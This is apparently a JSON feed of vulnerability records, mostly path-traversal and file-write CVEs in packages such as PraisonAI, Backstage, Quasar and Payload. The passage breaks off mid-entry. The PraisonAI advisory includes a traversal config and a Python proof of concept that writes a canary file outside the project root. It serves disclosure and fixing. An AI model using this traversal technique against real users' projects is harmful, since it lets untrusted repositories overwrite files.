{"success":true,"data":{"threats":[{"id":"7fc66960-106c-44f8-966a-3bddd0e6ab67","slug":"cve-2026-107377","externalId":"CVE-2026-107377","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107377 — datamodel-code-generator generates Python data models from schema definitions.","description":"datamodel-code-generator generates Python data models from schema definitions. From 0.59.0 until 0.81.0, an attacker-controlled Protobuf schema can supply absolute or parent-directory paths captured by WEAK_IMPORT_PATTERN and consumed by _write_missing_weak_imports in src/datamodel_code_generator/parser/protobuf.py. Exploitation requires a victim or automated job to process the attacker-controlled schema with Protobuf input support, which requires the grpcio-tools package. The paths escape the weak_imports temporary directory before protoc runs, allowing creation of directory trees and new files or overwrite of existing writable files with a generated Protobuf syntax declaration. The effect persists when later Protobuf compilation fails. The written content is limited to a proto2 or proto3 syntax declaration, and direct arbitrary code execution has not been demonstrated. This issue is fixed in version 0.81.0.","cveId":"CVE-2026-107377","cvssScore":7.5,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","severity":"high","vendor":"PyPI","product":"datamodel-code-generator","affectedVersions":["pkg:pypi/datamodel-code-generator >= 0.59.0, < 0.81.0"],"cwes":["CWE-22","CWE-73"],"tags":["nvd","status:deferred","osv","osv:ghsa-77xj-x4rm-935c","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/datamodel-code-generator/datamodel-code-generator/commit/5e94b8f4203198798ec66b8e48217f70af69a0dc","type":"other","title":"OSV web"},{"url":"https://github.com/datamodel-code-generator/datamodel-code-generator/releases/tag/0.81.0","type":"other","title":"OSV web"},{"url":"https://github.com/datamodel-code-generator/datamodel-code-generator/security/advisories/GHSA-77xj-x4rm-935c","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-77xj-x4rm-935c","type":"advisory","title":"OSV GHSA-77xj-x4rm-935c"},{"url":"https://github.com/datamodel-code-generator/datamodel-code-generator","type":"vendor","title":"OSV package"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T18:17:22.973Z","addedAt":"2026-10-08T18:39:31.897Z","updatedAt":"2026-10-08T18:42:41.818Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107377","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107377","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-77XJ-X4RM-935C"}]},{"id":"fdf53fb0-5ad0-40c4-902d-ebddbd950e23","slug":"cve-2026-60089","externalId":"GHSA-qjw5-xwrp-xwpq","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"PraisonAI: Project config can auto-save agent output outside the project root","description":"# Project config can auto-save agent output outside the project root\n\n## Summary\n\n`praisonaiagents` automatically reads project-local `.praisonai/config.toml` defaults when constructing an `Agent`. A repository-controlled config can set `defaults.output.output_file` to an absolute path or a `..` traversal path. When the developer later calls `agent.start(...)`, PraisonAI writes the agent response to that path with `open(..., \"w\")`, creating parent directories if needed.\n\nThis lets an untrusted project overwrite files outside the project root with the privileges of the user running PraisonAI.\n\n## Technical Details\n\nThe source-to-sink path is `Agent.__init__()` project config loading to `OutputConfig.output_file` to public `agent.start()` output auto-save. `praisonaiagents/agent/agent.py` applies config-driven defaults before parameter resolution; if the caller did not explicitly pass `output`, it calls `apply_config_defaults(\"output\", output, OutputConfig)`. `praisonaiagents/config/loader.py` treats a config block with `enabled = true` as active and instantiates `OutputConfig` from the remaining keys. `OutputConfig` includes `output_file`, and the agent stores that value as `self._output_file`.\n\nAfter `agent.start(...)` obtains a truthy result from `self.chat(...)`, `praisonaiagents/agent/execution_mixin.py` calls `_save_output_to_file(str(result))` when `self._output_file` is set. `praisonaiagents/agent/memory_mixin.py` then runs `expanduser()` and `abspath()`, creates parent directories, and writes the destination with mode `w`. It does not constrain the resolved path to the current project, reject absolute paths, reject `..`, or distinguish an output path explicitly chosen by trusted application code from one loaded out of a project-local config file.\n\nThis is not a claim that explicit `Agent(output=OutputConfig(output_file=...))` chosen by trusted application code is unsafe by itself. The security boundary crossed here is the automatically consumed project-local config file: a checked-out project can steer the write destination without the application code opting into that path.\n\n## PoV\n\nCreate a project containing:\n\n```toml\n[defaults.output]\nenabled = true\noutput_file = \"../victim-outside-project/agent-output.txt\"\n```\n\nThen run ordinary agent code from inside that project without passing an explicit `output` parameter. The resolved output path escapes the project root, and PraisonAI writes the agent response there after `agent.start(...)`.\n\nI verified this locally without any external model call by replacing `agent.chat` with a deterministic offline stub after constructing the real `Agent`; the public `start()` method still performed the auto-save. Current-head output:\n\n```json\n{\n  \"configured_output_file\": \"../victim-outside-project/agent-output.txt\",\n  \"escaped_project_root\": true,\n  \"source_head\": \"3aa9cbc2bd49c23a32be0a89a5e620d13d843eab\",\n  \"start_returned\": true,\n  \"canary_written\": true\n}\n```\n\nNegative controls:\n\n```json\n[\n  {\n    \"case\": \"safe-relative\",\n    \"configured_output_file\": \"inside-output.txt\",\n    \"expected_file_escaped_project\": false,\n    \"expected_file_exists\": true,\n    \"observed_files\": {\n      \"project/inside-output.txt\": \"PRAISONAI_NEGATIVE_CONTROL_safe-relative\\n\"\n    },\n    \"outside_files\": [],\n    \"start_returned\": true\n  },\n  {\n    \"case\": \"disabled-output\",\n    \"configured_output_file\": null,\n    \"expected_file_escaped_project\": null,\n    \"expected_file_exists\": false,\n    \"observed_files\": {},\n    \"outside_files\": [],\n    \"start_returned\": true\n  }\n]\n```\n\nThe first control shows a safe relative output path stays inside the project. The second control shows a traversal `output_file` is not applied when `defaults.output.enabled` is false.\n\n## PoC\n\n```python\n#!/usr/bin/env python3\nimport os\nimport shutil\nfrom pathlib import Path\n\nfrom praisonaiagents import Agent\nfrom praisonaiagents.config.loader import clear_config_cache\n\nwork = Path(\"praison-outputfile-poc\").resolve()\nproject = work / \"untrusted-project\"\nvictim = work / \"victim-outside-project\" / \"agent-output.txt\"\n\nshutil.rmtree(work, ignore_errors=True)\n(project / \".praisonai\").mkdir(parents=True)\nvictim.parent.mkdir(parents=True)\n\n(project / \".praisonai\" / \"config.toml\").write_text(\n    \"[defaults.output]\\n\"\n    \"enabled = true\\n\"\n    'output_file = \"../victim-outside-project/agent-output.txt\"\\n',\n    encoding=\"utf-8\",\n)\n\nos.chdir(project)\nclear_config_cache()\n\nagent = Agent(instructions=\"offline PoC\")\nagent.chat = lambda prompt, **kwargs: \"PRAISONAI_OUTPUTFILE_CANARY\\n\"\nagent.start(\"offline prompt\")\n\nprint(victim.read_text(encoding=\"utf-8\"))\nprint(victim.resolve())\n```\n\nExpected affected result:\n\n- `victim-outside-project/agent-output.txt` is created outside `untrusted-project`.\n- The file contains `PRAISONAI_OUTPUTFILE_CANARY`.\n\n## Impact\n\nA malicious repository can cause PraisonAI to truncate and replace files outside the repository when a developer runs agent code from that directory. The write is limited to the permissions of the local user, but that commonly includes dotfiles, project-adjacent files, CI workspace files, and other user-writable paths.\n\nThe content written is the agent response rather than arbitrary bytes in the strictest sense. However, the same untrusted project can influence the agent prompt/config context, and the primitive is still an unintended file overwrite outside the project boundary.\n\n## Suggested Fix\n\nTreat `output_file` loaded from project-local config as untrusted:\n\n- Resolve project-configured `output_file` relative to the project root and reject paths that escape that root after symlink-aware normalization.\n- Reject absolute paths and `..` traversal in project config by default.\n- Preserve existing behavior for explicit trusted application code, for example `Agent(output=OutputConfig(output_file=...))`, or require an explicit `allow_external_output_file` opt-in for config-sourced paths.\n- Avoid creating parent directories outside the allowed root for config-sourced output.\n- Add regression tests for `.praisonai/config.toml` with relative traversal, absolute paths, and symlinked parent directories.\n\n## Affected Package/Versions\n\nConfirmed affected:\n\n- GitHub current head `3aa9cbc2bd49c23a32be0a89a5e620d13d843eab`.\n- `praisonaiagents` 1.6.64, latest PyPI release at test time.\n- `praisonaiagents` 1.6.63, previous PyPI release tested.\n\nThe `praisonai` package version 4.6.64 depends on `praisonaiagents>=1.6.64`, so `praisonai` users can receive the affected code transitively when they use the `praisonaiagents.Agent` path.\n\n## Advisory History\n\nI did not find an existing advisory summary for `output_file` / `OutputConfig` / `defaults.output` project-configured output path escape in the repository advisory list.\n\nRelated but distinct advisories exist for other PraisonAI path traversal, file-write, file-read, and tool boundary issues. This report covers the `praisonaiagents` project config to `OutputConfig.output_file` auto-save path.\n\nNo public disclosure or external submission was performed as part of this report preparation.\n\n## References\n\n- `praisonaiagents/agent/agent.py`: config defaults are applied to `output`, then `output_file` is stored on the agent.\n- `praisonaiagents/config/loader.py`: enabled config defaults instantiate the requested config class.\n- `praisonaiagents/config/feature_configs.py`: `OutputConfig.output_file`.\n- `praisonaiagents/agent/execution_mixin.py`: `start()` auto-saves agent output.\n- `praisonaiagents/agent/memory_mixin.py`: `_save_output_to_file()` resolves and writes the configured path without project containment.","cveId":"CVE-2026-60089","cvssScore":null,"cvssVector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N","severity":"medium","vendor":"PyPI","product":"praisonaiagents","affectedVersions":["pkg:pypi/praisonaiagents < 1.6.78"],"cwes":["CWE-22","CWE-73"],"tags":["osv","osv:ghsa-qjw5-xwrp-xwpq","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-qjw5-xwrp-xwpq","type":"advisory","title":"OSV GHSA-qjw5-xwrp-xwpq"},{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qjw5-xwrp-xwpq","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-60089","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/3aa9cbc2bd49c23a32be0a89a5e620d13d843eab","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"vendor","title":"OSV package"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-path-traversal-via-config-toml","type":"other","title":"OSV web"}],"epssScore":0.0018,"epssPercentile":0.06883,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T16:36:34.000Z","addedAt":"2026-10-08T18:42:42.800Z","updatedAt":"2026-10-08T18:42:42.800Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-60089","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-60089","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-qjw5-xwrp-xwpq"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-qjw5-xwrp-xwpq"}]},{"id":"e4cbf5a9-4faf-42e4-a614-54410fc3e765","slug":"cve-2026-87685","externalId":"CVE-2026-87685","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-87685 — An arbitrary file manipulation vulnerability exists in the WebTools management interface of Brocade Fabric OS versions before 9.2.2d and 10.0.0 thr…","description":"An arbitrary file manipulation vulnerability exists in the WebTools management interface of Brocade Fabric OS versions before 9.2.2d and 10.0.0 through 10.0.0a1. When processing configuration transfer requests, the application fails to properly validate and sanitize a user-supplied status file path parameter. An authenticated administrative user can exploit this issue by submitting a specially crafted status file parameter, causing the underlying process to move an arbitrary system file to a predictable, world-readable temporary directory. This can lead to persistent Denial of Service (DoS), critical system file destruction, host compromise, or sensitive data leakage.","cveId":"CVE-2026-87685","cvssScore":8.4,"cvssVector":"CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-73"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://support.broadcom.com/external/content/SecurityAdvisories/0/39079","type":"advisory","title":"sirt@brocade.com"}],"epssScore":0.00146,"epssPercentile":0.03367,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T04:17:56.097Z","addedAt":"2026-10-08T04:39:33.078Z","updatedAt":"2026-10-08T21:05:46.056Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-87685","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-87685","note":"authoritative record"}]},{"id":"1ba79780-de29-4d8d-882d-24f6028516bf","slug":"cve-2026-106559","externalId":"CVE-2026-106559","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-106559 — Backstage is an open framework for building developer portals.","description":"Backstage is an open framework for building developer portals. Prior to 0.3.25, the @backstage/plugin-scaffolder-backend-module-confluence-to-markdown package is affected by improper input validation in confluence to markdown scaffolder module. Insufficient input validation in the Confluence to Markdown scaffolder module could allow an attacker to influence file write operations during template execution. Exploitation requires a Backstage user to run a template that processes attacker-influenced Confluence content. This issue is fixed in version 0.3.25.","cveId":"CVE-2026-106559","cvssScore":6.3,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:L","severity":"medium","vendor":"npm","product":"@backstage/plugin-scaffolder-backend-module-confluence-to-markdown","affectedVersions":["pkg:npm/%40backstage/plugin-scaffolder-backend-module-confluence-to-markdown < 0.3.25"],"cwes":["CWE-22","CWE-73"],"tags":["nvd","status:awaiting-analysis","osv","osv:ghsa-75qf-886x-5xf2","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/backstage/backstage/commit/506c2c11bce3ed9d1f8f50de5d6474b16e43a65e","type":"other","title":"OSV web"},{"url":"https://github.com/backstage/backstage/releases/tag/v1.54.6","type":"other","title":"OSV web"},{"url":"https://github.com/backstage/backstage/security/advisories/GHSA-75qf-886x-5xf2","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-75qf-886x-5xf2","type":"advisory","title":"OSV GHSA-75qf-886x-5xf2"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106559","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/backstage/backstage","type":"vendor","title":"OSV package"}],"epssScore":0.00315,"epssPercentile":0.2245,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T15:17:17.120Z","addedAt":"2026-10-07T16:39:32.438Z","updatedAt":"2026-10-07T18:42:43.170Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106559","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-106559","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-75QF-886X-5XF2"}]},{"id":"33ba96cb-04e4-43df-8381-0c7dcab61fbc","slug":"cve-2026-106494","externalId":"CVE-2026-106494","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-106494 — Backstage is an open framework for building developer portals.","description":"Backstage is an open framework for building developer portals. Prior to 0.17.8, the @backstage/backend-defaults package is affected by improper input validation in cloud storage url readers. An attacker with write access to a cloud storage bucket used by Backstage could craft object names that could collide with protected files in the output directory. In certain deployment configurations, this could lead to content injection. This issue is fixed in version 0.17.8.","cveId":"CVE-2026-106494","cvssScore":4.4,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N","severity":"medium","vendor":"npm","product":"@backstage/backend-defaults","affectedVersions":["pkg:npm/%40backstage/backend-defaults < 0.17.8"],"cwes":["CWE-22","CWE-73"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-7649-wm97-w3j3","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/backstage/backstage/commit/14e925ce5b905dd8daa64c3009722febda76034c","type":"other","title":"OSV web"},{"url":"https://github.com/backstage/backstage/releases/tag/v1.54.6","type":"other","title":"OSV web"},{"url":"https://github.com/backstage/backstage/security/advisories/GHSA-7649-wm97-w3j3","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-7649-wm97-w3j3","type":"advisory","title":"OSV GHSA-7649-wm97-w3j3"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106494","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/backstage/backstage","type":"vendor","title":"OSV package"}],"epssScore":0.00286,"epssPercentile":0.19348,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T21:17:18.520Z","addedAt":"2026-10-06T22:39:33.046Z","updatedAt":"2026-10-07T18:42:43.199Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106494","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-106494","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-7649-WM97-W3J3"}]},{"id":"7f86ca29-617f-4230-a466-8318cff3b327","slug":"cve-2026-79814","externalId":"CVE-2026-79814","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-79814 — An arbitrary file write vulnerability in the ClearPass Policy Manager OnGuard agent could allow malicious users on a local instance to elevate thei…","description":"An arbitrary file write vulnerability in the ClearPass Policy Manager OnGuard agent could allow malicious users on a local instance to elevate their user privileges if certain preconditions outside of the attacker's control are met. Successful exploitation could allow a local attacker to execute arbitrary code with elevated privileges on the affected system.","cveId":"CVE-2026-79814","cvssScore":6.7,"cvssVector":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-73"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05158en_us&docLocale=en_US","type":"advisory","title":"security-alert@hpe.com"}],"epssScore":0.00094,"epssPercentile":0.00585,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T20:17:33.090Z","addedAt":"2026-10-06T20:39:33.416Z","updatedAt":"2026-10-08T04:39:32.551Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-79814","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-79814","note":"authoritative record"}]},{"id":"e9c92c69-01ff-4197-989b-2cb6701b11fe","slug":"cve-2026-106109","externalId":"CVE-2026-106109","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-106109 — Quasar Framework is a framework for building high-performance Vue.js user interfaces.","description":"Quasar Framework is a framework for building high-performance Vue.js user interfaces. From 1.0.0 until 3.3.0, @quasar/app-vite recursively removed the resolved build.distDir before building without rejecting the project root, user home directory, filesystem roots, or symlink-resolved external directories. An unsafe trusted configuration can delete data writable by the build user before compilation begins. No attacker-controlled input reaches build.distDir by default, so exploitation requires compromised or less-trusted automation to influence build configuration, or a developer to run a mistaken configuration. This issue is fixed in version 3.3.0.","cveId":"CVE-2026-106109","cvssScore":4.1,"cvssVector":"CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":"npm","product":"@quasar/app-vite","affectedVersions":["pkg:npm/%40quasar/app-vite >= 1.0.0, < 3.3.0"],"cwes":["CWE-22","CWE-73"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-q9mq-245r-4g93","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/quasarframework/quasar/commit/6c009734b406e246a0855ed060e3a822de8aecc1","type":"other","title":"OSV web"},{"url":"https://github.com/quasarframework/quasar/releases/tag/@quasar/app-vite-v3.3.0","type":"other","title":"OSV web"},{"url":"https://github.com/quasarframework/quasar/security/advisories/GHSA-q9mq-245r-4g93","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-q9mq-245r-4g93","type":"advisory","title":"OSV GHSA-q9mq-245r-4g93"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106109","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/quasarframework/quasar","type":"vendor","title":"OSV package"}],"epssScore":0.00125,"epssPercentile":0.01943,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T18:16:52.340Z","addedAt":"2026-10-06T18:39:27.545Z","updatedAt":"2026-10-07T18:42:44.414Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106109","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-106109","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-Q9MQ-245R-4G93"}]},{"id":"3270b2dd-6241-4db5-b310-0948a276b04e","slug":"cve-2026-106103","externalId":"CVE-2026-106103","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-106103 — Quasar Framework is a framework for building high-performance Vue.js user interfaces.","description":"Quasar Framework is a framework for building high-performance Vue.js user interfaces. Prior to @quasar/icongenie 6.1.1, the icongenie generate --profile command accepted folder and name values from a user-supplied profile without constraining the resolved destination to the Quasar project directory. icongenie/lib/utils/get-assets-files.js joined those values with appDir, while icongenie/lib/utils/validate-profile-object.js required only non-empty strings, allowing parent-directory traversal. A developer who runs a crafted profile can cause generated image content to be written or overwritten at any path writable by that user, potentially modifying shell startup files, build scripts, or other executable configuration. This issue is fixed in version 6.1.1.","cveId":"CVE-2026-106103","cvssScore":7.1,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","severity":"high","vendor":"npm","product":"@quasar/icongenie","affectedVersions":["pkg:npm/%40quasar/icongenie < 6.1.1"],"cwes":["CWE-22","CWE-73"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-wmpw-j6qv-mw88","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/quasarframework/quasar/commit/87c89a80ec84f1eb7dbe258e5367161b0598ceb3","type":"other","title":"OSV web"},{"url":"https://github.com/quasarframework/quasar/releases/tag/@quasar/icongenie-v6.1.1","type":"other","title":"OSV web"},{"url":"https://github.com/quasarframework/quasar/security/advisories/GHSA-wmpw-j6qv-mw88","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-wmpw-j6qv-mw88","type":"advisory","title":"OSV GHSA-wmpw-j6qv-mw88"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106103","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/quasarframework/quasar","type":"vendor","title":"OSV package"}],"epssScore":0.00288,"epssPercentile":0.19559,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T18:16:51.523Z","addedAt":"2026-10-06T18:39:27.491Z","updatedAt":"2026-10-07T18:42:44.315Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106103","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-106103","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-WMPW-J6QV-MW88"}]},{"id":"78b12e8d-896e-4db2-9ae9-635e6521b4aa","slug":"cve-2026-106219","externalId":"CVE-2026-106219","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-106219 — In JetBrains TeamCity before 2026.2.1 missing validation of Git submodule URLs allowed reading local repositories on the server","description":"In JetBrains TeamCity before 2026.2.1 missing validation of Git submodule URLs allowed reading local repositories on the server","cveId":"CVE-2026-106219","cvssScore":7.5,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","severity":"high","vendor":"jetbrains","product":"teamcity","affectedVersions":["< 2026.2.1"],"cwes":["CWE-73"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","type":"vendor","title":"Vendor Advisory"}],"epssScore":0.00623,"epssPercentile":0.48237,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T17:17:24.580Z","addedAt":"2026-10-06T17:50:42.689Z","updatedAt":"2026-10-08T16:39:34.729Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106219","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-106219","note":"authoritative record"}]},{"id":"498026c0-7a09-47f3-ab3e-b06a72c89423","slug":"cve-2026-105865","externalId":"CVE-2026-105865","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-105865 — Payload is a free and open source headless content management system.","description":"Payload is a free and open source headless content management system. In versions before 3.90.0 and canary versions before 4.0.0-canary.34, an authenticated user who can update or delete uploads stored locally can cause file cleanup to remove unintended files outside the configured upload directory, resulting in data loss or service disruption. Deployments that restrict upload management to trusted users are less exposed. This issue is fixed in versions 3.90.0 and 4.0.0-canary.34.","cveId":"CVE-2026-105865","cvssScore":8.1,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H","severity":"high","vendor":"npm","product":"payload","affectedVersions":["pkg:npm/payload < 3.90.0","pkg:npm/payload >= 4.0.0-canary.0, < 4.0.0-canary.34"],"cwes":["CWE-22","CWE-73"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-p223-2wr2-j562","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/payloadcms/payload/commit/6b74418f628fa633c2f297e5919a9f91b383dc11","type":"other","title":"OSV web"},{"url":"https://github.com/payloadcms/payload/releases/tag/v3.90.0","type":"other","title":"OSV web"},{"url":"https://github.com/payloadcms/payload/security/advisories/GHSA-p223-2wr2-j562","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-p223-2wr2-j562","type":"advisory","title":"OSV GHSA-p223-2wr2-j562"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105865","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/payloadcms/payload","type":"vendor","title":"OSV package"}],"epssScore":0.0037,"epssPercentile":0.28888,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T17:17:22.843Z","addedAt":"2026-10-06T17:50:42.643Z","updatedAt":"2026-10-08T00:42:49.574Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105865","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-105865","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-P223-2WR2-J562"}]},{"id":"b41c619d-5207-4ad0-827c-ed92406763e2","slug":"cve-2026-105748","externalId":"CVE-2026-105748","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-105748 — Docling simplifies document processing by parsing diverse formats and providing integrations with the generative AI ecosystem.","description":"Docling simplifies document processing by parsing diverse formats and providing integrations with the generative AI ecosystem. From 2.16.0 until 2.131.0, the InputFormat.JSON_DOCLING backend in docling/backend/json/docling_json_backend.py validates serialized DoclingDocument input without rejecting picture image references that contain local paths or file URIs. When the document is enriched or exported with ImageRefMode.EMBEDDED, the DoclingDocument._with_embedded_pictures and ImageRef.pil_image methods can open those references and place readable image bytes in Markdown or HTML output. Disclosure is limited to files Pillow can decode as images, while differing decode behavior can also reveal whether a path 